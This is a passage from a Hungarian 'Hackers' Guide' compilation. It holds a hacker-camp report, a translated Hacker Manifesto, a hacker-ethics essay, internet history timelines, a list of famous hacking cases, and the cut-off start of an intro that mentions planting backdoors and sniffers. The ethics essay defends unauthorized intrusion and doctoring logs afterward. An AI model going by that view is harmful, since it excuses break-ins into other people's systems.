között kábelek, a sátrakban kisebb gépek, HUB-ok, néhol nem kuriózum a 17"-es monitor sem. Van, aki a hóna alatt hordja a fél millió forintot érõ laptopját, így amikor elõadáson ül, tud jegyzetelni, vagy eddig letöltött anyagokat olvasgatni. Sajnos sokszor elõfordult, hogy jobban járt az ember, ha hozott magával olvasnivalót, mert a csúszások miatt nem minden elõadás kezdõdött pontosan, de ez az önszervezõdés és a névtelenség ára. Sokan álnéven hirdették meg az elõadásaikat, így nem lehetett tudni, hogy ki is az, aki nem jött el.
26
Hackers’ Guide
A névtelenségre a szervezõk is vigyáztak. A gépeknek kiadható IP számok csipeszekre voltak felírva, így a regisztrációról érkezõk találomra akasztottak le egy csipeszt. A regisztráció is úgy történt, hogy a HIP-es azonosítót és a jelszót kellett a helyszínen begépelni. A HIP-es azonosítóhoz a hálózaton keresztül lehetett hozzáférni. A névtelenség adott volt, és csak az fedte fel kilétét, aki akarta. Sokan pózoltak a sajtó embereinek, akik nem gyõztek fotózni. A tábor ideje alatt már lehetett is olvasni a New York Times (http://www.nytimes.com), a Wired (http://www.wired.com) és több más lap beszámolóját és a táborról készült képeket is meg lehetett nézni. Érdekes módon minden lap beszámolt arról, hogy Bill Gates mekkora ellenszenvet váltott ki a tábor embereibõl. A szürke sírkõ, amit neki emeltek igen látogatott hellyé vált, és éjszaka ki is világították. A táborban levõ "élõ kamerák" egyike folyamatosan a sírkõre volt állítva. A kamerák 5 percenként közvetítettek egy képet a hálózat felé. A vélemények megoszlottak a cselekedet értelmét illetõen, de biztos, hogy a leglátogatottabb és legtöbbet fotózott hely volt a táborban! Összefoglalásképpen talán sokan tartottak a megfigyelõktõl, és így nem derült ki mindaz, amivel a helyszínre érkeztek az emberek, és három nap nem elég, hogy minden sátor titkába beleláthasson az ember. Pedig azok a bizonyos megfigyelõk is tanulhattak volna, hogy rendszereiknek mi a hibája, hiszen nincs tökéletes rendszer! Igaz, hogy a VMS-t mindenki tiszteli, de manapság már az is törhetõ. Nem pár soros Perl script-ekkel vagy buffer overflow-os hibák kihasználásával, de van út a belsejébe. Felmerült a gondolat, hogy kellene itthon is szervezni egy összejövetelt, hogy a hazai helyzetet megvitassuk, hiszen állami, pénzügyi és katonai szektorban egyaránt megindult a "számítógépesítés", ugyanakkor a biztonság fogalma nem telt meg kellõ tartalommal a hazai piacon. Hacker-ek pedig vannak itthon is, akiktõl iskolák és intézmények inkább félnek, mintsem nyitottak lennének feléjük mielõtt cracker-ekké válnak, hiszen akit nem fogad be a jó oldal az könnyebben állhat át a másik oldalra. Budapesten a Szerb utca egyik épületének a falán láttam a következõ feliratot: "Ha tiltással nevelsz, hazudni tanítasz!" Viszlát 2001-ben!? Clifford
************************************************************************************************
A hacker kiáltványa Még egyet elkaptak ma, minden újságban benne van. "Letartóztattak egy tinédzsert számítógépes buncselekményért", "A bankba való behatolás után letartóztattak egy hackert"...
27
Hackers’ Guide
Átkozott kölykök. Mind egyformák. De te néztél valaha egy hacker szeme mögé? Gondolkodtál már valaha azon, hogy mi mozgatja, milyen erok formálják, mitol lett ilyen? Hacker vagyok, lépj be a világomba... Az én világom az iskolában kezdodik... Okosabb vagyok, mint a többi srác, ez a marhaság, amit tanítanak, untat... Átkozott alulteljesíto kölyök. Mind egyformák. Középiskolában vagyok. Hallgattam a tanárokat, ahogy tizenötödször is elmagyarázzák, hogyan kell egyszerusíteni a törtet. Értem. "Nem, Ms. Smith, nem írtam le a házit. A fejemben csináltam meg..." Átkozott kölyök. Biztosan lemásolta. Mind egyformák. Egy felfedezést tettem ma. Találtam egy számítógépet. Várjunk csak egy pillanatra, ez király. Azt csinálja, amit elvárok tole. Ha mégsem, az azért van, mert elrontottam valamit. Nem azért, mert utál engem... Vagy fenyegetve érzi magát... Vagy azt gondolja, hogy okostóni vagyok... Vagy nem szeret tanítani és nem kellene itt lennie... Átkozott kölyök. Folyton csak játszik. Mind egyformák. És akkor megtörtént... kinyílt a kapu a világra... végigrohant a telefonvonalon, mint a heroin a kábítószerfüggo vérében, egy elektronikus impulzus, egy menedék a mindennapok inkompetenciája elol... megtaláltam a hajót. "Ez az... ide tartozom..." Mindenkit ismerek itt... még akkor is, ha soha nem találkoztam velük, soha nem beszéltem velük, és soha nem hallok felolük még egyszer... Mindannyiótokat ismerem... Átkozott kölyök. Megint lefoglalja a telefonvonalat. Mind egyformák... Biztos vagy benne, hogy mind egyformák vagyunk... bébiétellel etettek bennünket az iskolában, mikor mi steak-re vágyunk... a hús apró darabjai, amelyeket átengedtetek nekünk, elore megrágottak és ízetlenek voltak. Szadisták uraltak bennünket, és egykedvuek néztek el fölöttünk. Az a néhány valaki, akinek volt mit tanítani nekünk, tehetséges diákoknak tartott bennünket, de ez a néhány olyan volt, mint vízcseppek a sivatagban. Most már ez a mi világunk... az elektronok és kapcsolók világa, a baud szépsége. Mi ingyen használunk egy már létezo szolgáltatást, amelyik rohadt olcsó lehetne, ha nem mohó nyerészkedok kezében lenne, és minket neveztek bunözoknek. Felfedezünk... és bunözoknek neveztek bennünket. Tudás után kutatunk... és bunözoknek neveztek bennünket. Borszín, nemzetiség, vallási nézetek nélkül létezünk... és bunözoknek neveztek bennünket. Atombombát gyártotok, háborúztok, gyilkoltok, csaltok, és hazudtok nekünk, és megpróbáljátok elhitetni, hogy ez a mi érdekünkben történik, és akkor mi vagyunk bunözok. Igen, bunözo vagyok. A bunöm a kíváncsiság. A bunöm az, hogy azután ítélem meg az embereket, amit mondanak és gondolnak, és nem a külsejük alapján. A bunöm, hogy okosabb vagyok, mint ti, ez olyan dolog, amit soha nem fogtok nekem megbocsátani. Hacker vagyok, és ez a kiáltványom. Megállíthatjátok az egyént, de nem állíthattok meg minket... végül is, mind egyformák vagyunk.
28
Hackers’ Guide
Kelt 1986 január 8.-án. Copyright 1986 Loyd Blankenship (
[email protected]). Minden jog fenntartva.Fordította: Voyager2
************************************************************************************************
Hacker-etika Az anyag fordítása/átdolgozása/kiegészítése a "The Reality of Ethical Hacking" /Active Matrix/ címu anyagnak. Az igazi hackert az etika különbözteti meg a bunözoktol. A hacker-etika egyszeruen egy pár szabály, amelynek a hacker aláveti magát. Az én véleményem szerint ha ezt nem teszed meg, nem vagy hacker, tekintet nélkül az intelligenciádra és a képességeidre. Sok, magát hackernek tekinto egyszeru bunözo miatt van olyan megítélése ma a hackereknek, amilyen. Itt van az én etikai szabályzatom: Soha ne törölj vagy változtass meg egyetlen fájlt sem a hackelt számítógépen. Úgy bánj a hackelt számítógéppel, mintha a tiéd volna. Értesítsd a rendszergazdát bármilyen biztonsági lyukról, amelyet felfedezel. Ne hackelj azért, hogy pénzt lophass. Ne dolgozz megrendelésre. Ne vállalj túl magas kockázatot - ismerd a saját képességeidet. Mindig légy kész megosztani tudásod másokkal.
A hackeretika szabályai azon gondolatot fogalmazzák meg, hogy egy feltört rendszer megváltoztatása nem megengedheto, de a behatolás maga (károkozás és személyes vagy titkos adatok ellopása nélkül) igen. Ez ott válik bonyolulttá, amikor a "károkozás" mibenlétét kezdjük feszegetni: egyesek szerint lehetetlen az etikai szabályokat betartani, mert például egy exploit alkalmazása már önmagában is károkozás. Az a tényt is figyelembe kell venni, hogy általában a behatolás után a logokat törölni vagy kozmetikázni kell. Egyetértek azzal, hogy az igazi hackerek szabályzatában sok félreértelmezheto szürke folt van, de ez nem teszi az etikát betarthatatlanná vagy a bunözoi magatartást felismerhetetlenné. Ehhez egyszeruen józanul kell gondolkodni. Egy logbejegyzés megváltoztatása messze van valaki leveleinek letörlésétol, vagy személyes adatainak, jelszavainak elolvasásától vagy ellopásától. És egy exploit alkalmazása nem károkozás, mert a biztonsági lyuk már elotte is létezett a szoftver kódjában.
29
Hackers’ Guide
Az etikáról való vitatkozás közben sokan téves párhuzamot vonnak a valós élet és az elektronikus szituációk között. A leggyakoribb példa a tolvaj példája, aki betör egy házba: "Te szeretnéd, ha valaki kipróbálná a zárat a bejárati ajtódon, feltörné, körbejárna a házadban, aztán elmenne anélkül, hogy elvenne valamit?" A legtöbben nemleges választ adnának, ahhoz a hibás következtetéshez jutva, hogy egy számítógépes rendszer feltörése, még ha károkozás vagy személyes titkok megsértése nélkül is, etikátlan dolog. Sok dolog sántít ebben az összehasonlításban. A fizikai, valós világban egy ilyen betörés sokkal nagyobb sokkot okoz, mint egy elektronikus (itt számítógépes; egyébként a telefonvonalak piszkálása és egyéb elektronikus eszközök távoli buherálása is beletartozik) betörés. Habár a rendszergazdák nem szívesen gondolnak arra, hogy egy hacker áttöri a rendszer védelmét, azért én azt gondolom, hogy sokkal jobban megrémülnek, ha valaki a házukba próbál betörni. Az is tény továbbá, hogy azok a hackerek, akik csak egyszeruen a kihívásért törnek fel rendszereket, nem jelentenek veszélyforrást. Egyébként sem hallottam még olyan betörorol, aki házakba tör be csupán azért, hogy megtudja, képes-e rá. Ezen okokból kell élesen elválasztani egymástól a betörot és a hackert. A "nézd, de ne érintsd meg" hozzáállás etikusnak tekintendo. A legutolsó lépés az igazi számítógépes betörés során a kilépés elott a rendszergazda értesítése a biztonsági lyukról. Ez könnyen megteheto névtelenül, egy e-mailt küldve az egyik rendszer-accountról. Pontos információt kell adni a betörés folyamatáról, és a rendszergazda a hibák kijavítására fog koncentrálni, ahelyett hogy bepánikolna. Eredményképpen a rendszere biztonságosabb lesz. Nem kell túlzottan boncolgatni az etikai szabályokat. Néhányan ragaszkodnak ezekhez a szabályokhoz, azokkal ellentétben, akik egyszeruen csak bajt akarnak okozni. Sok ember érettségi szintje nem éri el a kello mértéket, amikor a potenciálisan veszélyes technikák alkalmazásáról van szó. Ennek következtében a közvélemény riadtsága értheto azokkal szemben, akik képesek számítógépes rendszereket feltörni. De ez nem igazolja a sztereotípiát, valamint a szükségtelenül magas büntetointézkedéseket a hackerekkel szemben. Tudom, hogy a felvetett dolgok sok, magát hackernek nevezo, azonban az etika szabályait be nem tartó személynek nem tetszenek, azonban a véleményemet vállalom és kész vagyok helyet biztosítani az ellenvéleménynek.
************************************************************************************************
Fontosabb időpontok az Internet fejlődésében (Magyarországon) 1986 - Indul az Információs Infrastruktúra Fejlesztési program (IIF).
30
Hackers’ Guide
1988 - Megalakul a KF Infrastruktúra Kft: az IIFP megvalósítása mellett informatikai szolgáltat sokat is nyújt. Működni kezd az ELLA levelező rendszer. 1989 tavasz - Az IIF keretében elkészül a csomagkapcsolt adatátviteli hálózat (X.25). Az IIF adatbázis-építési pályázatot hirdet. 1989 ősz - File transzfer szolgáltat s indul az IIF rendszerben (PETRA). 1990 - Megszületik a World Wide Web, egyelőre alfanumerikus böngészőkkel. 1990 - Indul az IIF program második fázisa. Linzen keresztül elérhetővé válik a nyugat-európai kutatói hálózat (EARN). 1991 - Az IIF intézményekben elérhetővé válik az Internet. 1991 - IBM mainframe szerver kerül a Budapesti Közgazdaságtudományi Egyetemre, e gép az IIF nemzetközi adatforgalmának egyik bázisa (a másik az IIF Központban van). A gépre rákapcsolódik az ELTE, a BME 's a JATE is. '91 júl. 15. - Az első közvetlen IP-kapcsolat a külföld felé: a genfi CERN 's a KFKI RMKI között. '91 okt. - Az InterNIC kiadja az első .hu IP-címet. '92 febr. 1. - Megalakul a Magyar Felsőoktatási, Kutatási és Közgyűjteményi Számítógéphálózati Egyesület. (HUNGARNET Egyesület) '92 júl. - Az IIF program világbanki támogatással pályázatot hirdet hardver eszközök beszerzésére. '92 aug. - Az első Networkshop konferencia. '92 dec. - Az IIF második adatbázis-építési pályázata. 1993 - Működni kezd a budapesti egyetemi gyűrű. (FDDI) 1993 - Megkezdődik az IIF önálló bérelt vonalas gerinchálózatának kiépítése. (HBONE) '93 nyár - Megjelenik az első grafikus WWW-böngésző, a Mosaic. '93 dec. - Elindul az első WWW-szerver Magyarországon. (Máray Tamás, BME Folyamatszabályozási Tsz.) 1994 - Az IIF gerinchálózatában a kiszolgálógépek száma eléri a 100-at, 23 regionális központban. Az IIF tagintézmények száma 450. Az IIF Program NIIF-ként folytatódik. '94 jan. - A Hungarian Home Page hivatalos bejegyzése a külföldi WWW regiszterekben.
31
Hackers’ Guide
'94 máj. - Bővül a HBONE budapesti magja, kettő helyett már négy bázis: IIF Központ, BME, Antenna Hungária és Matáv. '94 nov. 8. - Göncz Arpád átadja az NIIF Program új központi gépét, a SUN csúcsmodellt. 1995 - 2 Mbps-os vonal az amszterdami központba. (DANTE projekt) 1995 - A Soros Alapítvány pályázat útján 40 iskolának biztosít Internet-kapcsolatot. A HBONE már lefedi az egész országot. '95 aug. - Az NIIF keretében megnyílik a Magyar Elektronikus Könyvtár. '95 dec. - Elkészül a Nemzeti Informatikai Stratégia. '96 eleje - Elkészül a dél-budai egyetemi gyűrű: 5 FDDI gyűrőből áll már a városi hálózat a budapesti egyetemek között. '96 máj. - A Soros Alapítvány pályázatot hirdet: Internet-kapcsolat iskolai könyvtáraknak (150 iskola részére). '96 jún. 10. - A millecentenáriumi rendezvények keretében Horn elvtárs(:))) megnyitja az Internet Expo magyar pavilonját. '96 jún. 26. - Megnyílik a Soros Alapítvány Kulturális 's Kommunikációs Központja (C3). '96 júl. 15. - Megalakul a Nemzeti Hírközlési és Informatikai Tanács. '96 júl. 31.- Lezárul a Soros Alapítvány non-profit intézményeknek hirdetett pályázata: 204 intézmény kap Internet-hozzáférést. '96 júl. - Elkészül a Nemzeti Hírközléspolitikai Koncepció vitaanyaga. '96 aug. - A Nemzeti Kulturális Alap pályázatot hirdet a digitális kultura fejlesztésére. '96 szept. 1. - A művelődési miniszter bejelentése: 2000-re minden iskolának lesz Internet-kapcsolata. '96 szept. 25. - Az első kábeltévé-alapú iskolai Internet-kapcsolat. (Nyíregyháza, NIIF 's Szab-I-Net együttműködés.) '96 okt. 10. - A Hungary.Network Kft. AltaVista-rendszerű ingyenes keresőszolgáltatást indít a magyarországi site-okra (Heuréka!!). '96. okt. 12. - Megjelenik a magyar.net című havilap próbaszáma. '96 nov. - A Matáv üzembe állítja 1 Mbit/s-os vonal t Amerika (MCI) fel'. Kapacitásának felét a Hungarnet Egyesület használja.
32
Hackers’ Guide
'96 nov. 28. - Az MTA projektet indít "A magyar nyelvű kultúra 's az információs társadalom" címmel. '96 nov. 30. - A Hungarnet Egyesület megszünteti Bécsen keresztüli kapcsolat t az európai EBONE hálózattal, hivatkozva az MCI-vonal által meg növekedett kapacitásra. Ezáltal az akadémiai szféra számára javul az Amerikába irányuló kapcsolatok sebessége ás romlik a szomszédos országokba irányulóké. '96 dec. - A Népjóléti Minisztérium az Interneten is vitára bocsátja a készülő egészségügyi törvényt. '97 jan. 8. - Horn Gyula(elvtárs) az Interneten élőben válaszol az érdeklődők kérdéseire. (iNteRNeTTo)
************************************************************************************************
Hálózattörténelem 1957 A Szovjetúnió föllövi az elsô műholdat a Szputnyikot. Amerika aggódik, hogy tudományos-haditechnika fölénye veszélybe kerülhet, azt tervezi, hogy kvázi válaszlépésként alakít egy különleges kutatóintézetet. Ez lesz az Advanced Research Projects Agency (ARPA). 1961 Leonard Kleinrock, a Massachusetts Institute of Technology (MIT) tanára a packet switching technológiáról, azaz a számítógépes csomagkapcsolt hálózat elméletérôl jelentet meg cikket. 1962 J.C.R Lickider (MIT) egyik cikkében felvázolja a "galaktikus hálózat" (Galactic Network) vízióját. E hálózatról bárki a világ bármelyik sarkából gyorsan hozzáférhet bizonyos információkhoz és tehet közzé bármit ezen keresztül. Októberben megalakul az ARPA, elsô vezetôje J.C.R Lickider. 1965 Az elsô nagy távolságú telefonvonalas összeköttetés két komputer között. Egy Massachusettsben fölállított TX-2-es számítógépet kapcsolnak össze egy kaliforniai Q-32-essel. A kísérlet fônöke a MIT-es kutatócsoport egyik tagja, Lawrence G. Roberts. 1966 Megszületik a csomagkapcsolt technológián alapuló hálózat, az ARPANet terve. 33
Hackers’ Guide
1968-'69 Megkezdi működését (az elsôsorban védelmi) kutatási célokat szolgáló számítógépes hálózat, az ARPANet, az Internet ôse. Az elsô csomópont a kaliforniai egyetemen, az UCLA-n van. 1969-re már négy tagja van a hálózatnak, csatlakozik az UCSB (Santa Barbara-i egyetem), az SRI (stanfordi intézet) és az utahi egyetem. 1972 Bob Kahn, az idôközben DARPA-vá (Defense Advanced Research Projects Agency) átnevezett ARPA fônöke az International Computer Communication Conference tanácskozáson elôször mutatja be a nyilvánosságnak az ARPANetet. Ray Thomlinson megírja az elsô elektronikus levelezô-programot. Az egyszerű programocska szöveges üzeneteket tud küldeni és fogadni a hálózaton keresztül. Az e-mail megszületése történelmi esemény. Az Internet legfontosabb alkalmazási területe nyílik meg. Az ARPANet-nek már 23 csomópontja van. 1973 Vinton Cerf stanfordi kutató és Bob Kahn DARPA-fônök új nyelvet keres a hálózatnak. Elkezdik fejleszteni a TCP/IP protokollt (Transmission Controll Protocol/Internet Protocol), amely aztán hosszú évekig (tulajdonképpen a mai napig) az Internetbe kötött számítógépek közös nyelve lesz, sôt maga az Internet elnevezés is innen származik. Bob Metcalfe, a Xerox mérnöke kifejleszti az Ethernet technológiát, amely gyors adatátvitelt tesz lehetôvé koaxális kábellel összekötött számítógépek között. 1976-ra készül el a technológia, amely hatalmas lökést ad a számítógépes hálózatok elterjedésének. 1979 Steve Belloni, Tom Truscott és Jim Ellis kifejleszti a hírcsoportos hálózati kommunikáció rendszerét, az Usenetet. Az UUCP-re és az e-mailre alapozott technológia máig a legnépszerűbb Internet-felhasználások egyike. 1981 Az amerikai Nemzeti Tudományos Alap (National Science Foundation) létrehozza a CSNet hálózatot, amely rövidesen kapcsolódik az ARPANethez. Az új gerinchálózat kicsit gyorsabb, mint a másodpercenkénti 50 kilobites sebességgel működô ARPANet. A hálózati csomópontok száma így 213-ra nô. 1983 Január elsején az egész hálózat átáll a TCP/IP protokollra. A wisconsini egyetemen kifejlesztik a Domain Name Systemet (DNS), az Internetbe kötött gépek elnevezésének rendszerét. Bonyolult számsorok helyett lehet már könnyen megjegyezhetô nevekre hivatkozni. A hálózati csomópontok száma 562. 1985 A CSNetre alapulva új gerinchálózat születik, az NFSNet, amely az ARPANetnél és a CSNetnél hússzor gyorsabb, ugyanis másodpercenként 1,544 megabit átvitelére képes úgynevezett T1-es vonalain.
34
Hackers’ Guide
1988 Teljesen elkészül a gyors T1-es vonalakra épülô NFSNet gerinchálózat. Az Advanced Network Systems pedig már a T3-as vonalak fejlesztésével foglalkozik, mely másodpercenként 45 megabites adatátviteli sebességet tesz lehetôvé. A háló létszáma bôven ötvenezer fölött van. 1989 Tim Berners-Lee a genfi CERN kutatóintézetnél hyperextrendszert próbál kidolgozni. E rendszerrel a hálózaton gyorsan áttekinthetô módon lehetne publikálni mindenféle anyagokat, a szövegek közötti élôkapcsok (linkek) segítségével a hálózati navigáció is egyszerűbbé válna. Ez lesz a world wide web, a kilencvenes évek Internetforradalmának kiváltója. 1990 Megszünik az ARPANet. Az eredeti 50 kilobites háló szerepét az NFSNet gerinchálózata veszi át. A net drámai növekedése folytatódik: 313 000 csomópont van már. Folyamatos Internet-kapcsolat Magyarországról a Sztaki (Számítástechnikai Kutatóintézet) és a linzi (Ausztria) egyetem között. 1992 A CERN-ben hivatalosan bemutatják a world wide webet. 1993 Megalakul az InterNIC szervezet, amely szabályozza a hálózati nevek kiosztását. Marc Andereesen megírja az elsô grafikus webböngészô programot a Mosaicot. A www ezután szédületes tempóban kezd fejlôdni. Magyarországon is üzembe állítják az elsô webszervert a Budapesti Műszaki Egyetem folyamatszabályozási tanszékén. 1994 Az üzlet is egyre markánsabban jelen van a hálón: megalakul az elsô internetes pénzintézet, a First Virtual. A Mosaicot kifejlesztô Andereesen és a Silicon Graphics alapítója, Jim Clark létrehozza a Netscape vállalatot, amely Navigator nevű webböngészôjével rövidesen az Internet legfontosabb szoftvercégévé válik. 1995 A csomópontok száma 6 642 000!! A PC-világban szinte monopolhelyzetben lévô Microsoft megjelenik új operációs rendszerével, a Windows 95-tel (bár csak ne tette volna -Szilos ). Az operációs rendszerhez külön kapható kiegészítô csomag, a Plus tartalmazza a Microsoft saját webböngészôjét, a Mosaicból kifejlesztett Explorert. Megkezdôdik a böngészôháború a Netscape és a Microsoft között. 1996 Piackutató cégek adatai szerint csak ebben az évben 1,1 millió munkahelyet teremt a net. A végfelhasználók körülbelül 19 milliárd dollárt költenek internetes szoftvertermékekre. 1997 Becsült adat: idén 2,7 billió e-mail fordul meg a hálón. 2000-re ez a szám 6,9 billióra nôhet.
35
Hackers’ Guide
(A Népszabadság Világháló című melléklete alapján) - Szilos -
************************************************************************************************
A Byte magazin 98/4 -es számában megjelent cikke. A kalozkodas nem uj, az esetek gyakorisaga azonban ijeszto utemben novekszik. Minel kifinomultabb rendszerek jelennek meg, a kalozok annal elszantabban probalnak betorni. Ime nehany a kozismertebb esetek kozul:
1977 John Draper egy gabonapelyhes dobozbol szarmazo jatek sippal utanozta az ingyenes telefonvonalat kero jelet. 1978 Steve Jobs es Steve Wozniak, ket hobbi szamitogepes elkeszitett egy ugynevezett kek dobozt telekommunikacios szamitogepekre valo betoreshez. 1979 A 17 eves Kevin Mitnicket harom honapra orizetbe vettek, es egy ev probaidore iteltek, amiert betört a Pacific Bell COSMOS telefonkozpontjaba. 1983 Mitnicket hat honapra afiatalkoruak bortonebe csuktak, miutan betort a Pentagon szamitogepere. 1984 Megalakult a 2600 Magazine: The Hacker Quarterly 1987 Mitnicket 36 honap felfuggesztettre iteltek, amiert egy kaliforniai cegtol software-t lopott. 1988 Robert Morris egy virus segitsegevel 6000 szamitogepet tett tonkre az Interneten. Megalakult a Computer Emergency Response Team. 1989 Mitnick bunosnek vallotta magat szamitogepes csalas, es illegalis, tavolsagi hivashoz szukseges eleresi kodok birtoklasanak (ez utobbi kapcsolodik az 1988-ban a Digital Equipment Corp. szamitogepei elleni kalozakciohoz) buntetteben. Egy ev bortonre es hat honap felfuggesztettre iteltek. 1990 Morrist harom honap felfuggesztettre, 400 ora kozmunkara es 10 000 dollar birsagra iteltek 1988-ban elkovetett buneert. 1992 A Masters of Deception bandat bunosnek talaltak szamitogepes buncselekmenyek es osszeeskuves vadjaban. A tagok hat honap es egy ev kozotti szabadsagvesztest kaptak. Mitnick betort a Packard Bell szamitogepeire, amiert szabadulasa utani harom ev rendori felugyeletre iteltek. Megszokott, mielott az FBI elkapta volna.
36
Hackers’ Guide
1993 Justin Tunner Petersent tobb rendbeli szamitogepes csalasert, koztuk egy 150 000 dollaros atutalasert letartoztattak. Iteletet csokkentettek, miutan feladott mas kalozokat, koztuk Mitnicket. Kesobb csatlakozott az FBI-hoz. 1994 A kaliforniai DMV 1 millio dollaros dijat tuzott ki Mitnick letartoztatasaert, amiert az csalard modon probalt jogositvanyt szerezni maganak. 1995 Haromevi menekules utan Mitnicket Petersen segitsegevel letartoztattak, es 23 rendbeli szamitogepes csalassal vadoltak. Vlagyimir Levint a Citibankbol 10 millio dollart ellopo orosz kalozbanda vezetesevel vadoltak, es Londonban letartoztattak. 1996 aprilis A 19 eves Christopher Schanotot kiengedtek a bortonbol, es hazi orizetben tartottak, miutan eliteltek a Southwestern Bell Telephone, a Bell Communications Research, a Spring es az SRI International szamitogepeire valo betoresert. Mitnick 20 000 ervenyes hitelkartyaszamot lopott. Emellett bunosnek vallotta magat lopott mobiltelefon szamok hasznalataban es a probaido megserteseben ( a DEC gepeire valo betoresben). A varhato itelet 20 ev borton, plusz 2-3 ev a probaido megszegeseert. junius Amerikai es angol bankok, brokerhazak es befekteto cegek hajlandoak voltak olyan bunozoknek fizetni, akik szamitogepes rendszereik feltoresevel fenyegettek meg a cegeket. augusztus Kalozok bejutottak az Igazsagugyi Miniszterium honlapjara, es annak tartalmat uszito szovegekre es kepekre, peldaul Adolf Hitler fotojara csereltek. A helyet az Igazsagtalansag Miniszteriumava kereszteltek at. szeptember Mitnick es allitolagos tettestarsa, Lewis DePayne artatlannak vallotta magat a 2 es fel eves bunugyi kalozkodasaval kapcsolatban felhozott szovetsegi vadakkal szemben. A Mitnick elleni vadak 25, 1992 juniusa 1995 februarja kozott elkovetett szamitogepes betorest es ellenszegulest tartalmaztak. Ha Mitnicket bunosnek talaljak, akar 100 ev bortonre is itelhetik. november Kalozok tortek be az America Online Court TV oldalaira, amely O. J. Simpson perevel kapcsolatos hireket tartalmazott. december Egy kaloz a denial of service tamadassal leallitotta a Web Communicationst, 3000 kereskedelmi web-hely tarolojat. Egy azonositatlan csoport betort az Egyesult Allamok legierejenek web oldalaira, megtoltve azt szines szlogenekkel, es remes animaciokkal. 1997 januar Egy magat D.A.M.M. -nek nevezo csoport betort a UNICEF web oldalaira. A lapokon szupermodellek kepeit es Mitnickre utalo feliratokat helyeztek el. A huszeves Yale diak, Nicholas Ryan bevallotta, hogy olyan programot keszitett, amely ingyenes elerest biztositott az AOL-hez. A vad kepviseloje 250 000 dollarig terjedo birsagot es ot ev bortont kert. februar A Chaos Computer Club kalozai megjelentek a nemet televizioban, es bemutattak egy ActiveX vezerlot, amely penzt von le bankszamlakrol es masikra helyezi at anelkul, hogy a PIN kodra szukseg volna.
37
Hackers’ Guide
marcius Kalozok tortek be a NASA web oldalaira es politikai kialtvanyt helyeztek el azon. A rendszergazda letiltotta az oldalak elereset. Egy massachussetsi fiatal - aki letiltotta a Worcesteri repuloter legi iranyitotornya fele meno kommunikaciot - lett az elso fiatalkoru, akit a szovetsegi birosag elott szamitogepes kalozkodas miatt eliteltek. A fiu elismerte bunet, cserebe ket ev felfuggesztettet, birsagot es kozszolgalati munkat kapott. Kaloz tort be a Well-hez, jelszavakat lopott el, felhasznaloi adatokat es mas allomanyokat torolt, majd trojai programokat helyezett el a halozaton. aprilis Egy, a merevlemez osszes allomanyat torlo AOL4FREE.COM nevu trojai program terjedt az Interneten. Portugal kalozok tortek be az Indonez Hadsereg halozatara, amelynek modositasaval tiltakoztak a kormany kelet-timori politikaja ellen. Kalozok hatoltak be az Amnesty Internationalhoz, s a weben egy cigarettazo baba fenykepet helyeztek el. Május Carlos Felipe Salgado beismerte, hogy 100 000 hitelkartyaszamot lopott el egy San Diego-i gépről, valamint olyan programot telepitett, amely felismeri es rogziti az elofizetok jelszavait. Junius A Mezogazdasagi Miniszterium kulugyi szolgalata leallitotta honlapjat, miutan biztosagi problemakat fedezett fel. Mitnicket 22 honap, szovetsegi bortonben letoltendo szabadsagvesztesre iteltek, amiert illegalis mobiltelefon-kodokat birtokolt, es az 1989-es csalasat koveto megfigyelesi idoszakban megszegte a torvenyt. Oktober A ValuJet web oldalai lealltak, miutan kalozok lezuhano repulogepek kepeit, es kozvetlenul a ceg vezetoinek szolo kepeket helyeztek el rajta. 1998 Februar A SUid csoport egyik tagja behatolt az USA Kereskedelmi Miniszteriumanak oldalaira, es hamis informaciokkal toltotte meg azt. A Pentagon es az FBI kivizsgalta a kalozok azon sikeres kiserleteit, amelyekben nem rendszerezett informaciokat szereztek meg az orszag vedelmi szamitogepeirol. E betoresek soran a fegyveres erok minden agat tamadas erte, a megszerzett allomanyok kozott fizetesi es szemelyes adatok is talalhatok. Marcius A magat The Analyzernek nevezo kaloz betort a NetDex nevu kaliforniai Internet-szolgaltatohoz, otthagyott uzeneteben kaloztarsa letartoztatasa ellen tiltakozva. Az uzenet szerint az eredeti betoresert is o volt a felelos. A NASA,a haditengereszet es az egyetemek W95-ot es NT-t futtato gepei mind a denial of service tamadas celpontjaiva valtak. Az igy megtamadott szamitogep kek halalt hal. Az izraeli rendorseg letartoztatta a 18 eves Ehud Tenebaumot, alias The Analyzert, a Pentagon szamitogepeire valo betoresben jatszott szerepeert. Allitolag tobb tucat amerikai es izraeli allami, kereskedelmi es oktatasi rendszerbe hatolt be. Az izraeli hatosagok Tenebaum ket tizeneves vedencet is letartoztattak. Majus A L0pht csoport tagjai vallomast tettek a szenatus elott, amelyben azt allitottak, hogy fel oran belul kepesek az egesz Internetet leallitani. Szeptember Egy nappal azutan, hogy a Microsoft elkeszitette a Hotmail biztonsagi resenek javitasat, a kalozok megjelentek egy ezt semmise tevo JavaScript kóddal.
38
Hackers’ Guide
Kalozok hatoltak be a The New York Times web oldalaira, es 150 000 vasarnapi latogatot inzultaltak ellenseges kepekkel. Miutan az oldalakat helyreallitottak, a kalozok ismet visszaallitottak a modositott kezdooldalt. Az egyiptomi rendorseg letartoztatott két kalozt, akik lopott hitelkartya szamokkal 147 000 dollar erteku pornograf kepet, illetve filmet toltottek le. A kinai rendorseg elfogta Yang Wei programozot, aki betort egy orszagos szamitogep halozatba, es visszafejtett tobb, mint 500 azonositot es jelszot. A 28 eves Aaron Blossert azzal vadoltak, hogy behatolt az U.S. West szamitogepes rendszerebe, es tobb, mint 2500 szamitogepet egy 350 eves matematikai problema megoldasara hasznalt fel. Ekozben megszerezte a U.S. West 15 000 munkaallomasanak jelszavat, es a kodolt anyag nagy reszet tovabbitotta az internetre. Eredeti: frater
[email protected] - H3XR00T http://hexnet.hpage. net/
************************************************************************************************
Kezdés
A Hacker és társai Én most szives engedelmetekkel az IGAZI hackerről es hackelésről beszelnék, egész cikkemben. A hekker, vagyis hacker nem egy internetes kalózt jelentett régen, hanem egy programozó Gurut, aki arra törekedett, hogy egy programot írva azt minél kisebbre irja meg, de persze ugyanazokkal a képességekkel. Szóval a hacker mára sem hagyta el igazi mivoltát, csak most nem offline, hanem online dolgozik. A hacker security hole-okat használ ki, amelyek vagy rootot adnak, vagy SuperUseri privilégiumokat. Igazából így születtek meg az exploitok, amelyek általában "C" programok. Az exploit egyszerre általában egy bugot használ ki, amely segít elérni a célját. Ennyit a hackerről. Most következzen, mit is csinál egy hacker... Egy hacker ha már elérte célját általában BackDoor-okat rak fel az áldozati gépre, amelyek abban segítenek, ha az eredeti rendszergazda jelszót vált. Ezen kivul nagy forgalmú gépre érdemes Sniffereket tenni. A sniffer csak root joggal működik, de megéri, mivel azt figyeli, amikor 